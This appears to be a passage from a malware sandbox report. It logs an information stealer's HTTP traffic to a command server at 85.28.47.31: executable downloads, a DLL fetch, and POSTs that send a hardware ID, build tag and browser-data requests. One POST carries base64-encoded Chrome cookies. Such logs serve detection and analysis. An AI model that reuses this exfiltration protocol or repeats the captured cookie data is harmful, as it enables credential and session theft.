00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 15:57:08 GMTContent-Type: application/octet-streamContent-Length: 91648Last-Modified: Fri, 26 Jul 2024 15:01:21 GMTConnection: keep-aliveETag: "66a3ba41-16600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 62 05 40 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 0c 01 00 00 56 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 01 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 71 01 00 c8 00 00 00 00 90 01 00 9c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 74 01 00 2c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 f0 37 00 00 00 10 00 00 00 38 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 c2 d2 00 00 00 50 00 00 00 d4 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9d 33 00 00 00 30 01 00 00 34 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 17 00 00 00 70 01 00 00 12 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 9c 0f 00 00 00 90 01 00 00 10 00 00 00 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 15:57:10 GMTContent-Type: application/octet-streamContent-Length: 2755072Last-Modified: Fri, 26 Jul 2024 15:52:43 GMTConnection: keep-aliveETag: "66a3c64b-2a0a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 a1 9c a3 66 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 00 00 00 b0 27 00 00 06 2a 00 00 60 06 00 9a 10 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 d0 30 00 00 04 00 00 a3 71 2a 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 30 00 0c 05 00 00 00 b0 30 00 38 01 00 00 00 80 29 00 8c 4c 00 00 00 00 00 00 00 00 00 00 00 c0 30 00 9c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6e 29 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 81 30 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a8 ae 27 00 00 10 00 00 00 b0 27 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 60 ee 00 00 00 c0 27 00 00 f0 00 00 00 b4 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 f8 c3 00 00 00 b0 28 00 00 c4 00 00 00 a4 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 8c 4c 00 00 00 80 29 00 00 4e 00 00 00 68 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 30 42 00 00 00 d0 29 00 00 44 00 00 00 b6 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 90 5e 06 00 00 20 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 0c 05 00 00 00 80 30 00 00 06 00 00 00 fa 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 58 00 00 00 00 90 30 00 00 02 00 00 00 00 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 a0 30 00 00 02 00 00 00 02 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 38 01 00 00 00 b0 30 00 00 02 00 00 00 04 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 9c 03 00 00 00 c0 30 00 00 04 00 00 00 06 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIECFIEGDBKJKFIDHIECHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 42 42 30 41 46 41 33 31 36 44 33 33 39 32 32 35 39 37 34 39 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 2d 2d 0d 0a Data Ascii: ------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="hwid"A1BB0AFA316D3392259749------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="build"sila------GIECFIEGDBKJKFIDHIEC--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFIEHIEGDHIDGDGHDHJHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 2d 2d 0d 0a Data Ascii: ------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="message"browsers------DAFIEHIEGDHIDGDGHDHJ--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEHIIJJECFHJKECFHDGHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 2d 2d 0d 0a Data Ascii: ------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="message"plugins------JKEHIIJJECFHJKECFHDG--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEHJKJJJECFHJJJKKECHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 2d 2d 0d 0a Data Ascii: ------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="message"fplugins------IIEHJKJJJECFHJJJKKEC--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHCAKKJDBKKFHJJDHIIHost: 85.28.47.31Content-Length: 6975Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKJJEGIDBGIDGCBAFHCHost: 85.28.47.31Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 2d 2d 0d 0a Data Ascii: ------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKEHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 2d 2d 0d 0a Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file"------EGCBFIEHIEGCAAAKKKKE--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKEHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 2d 2d 0d 0a Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file"------EGCBFIEHIEGCAAAKKKKE--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKEHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 2d 2d 0d 0a Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file"------EGCBFIEHIEGCAAAKKKKE--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKEHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 2d 2d 0d 0a Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file"------EGCBFIEHIEGCAAAKKKKE--
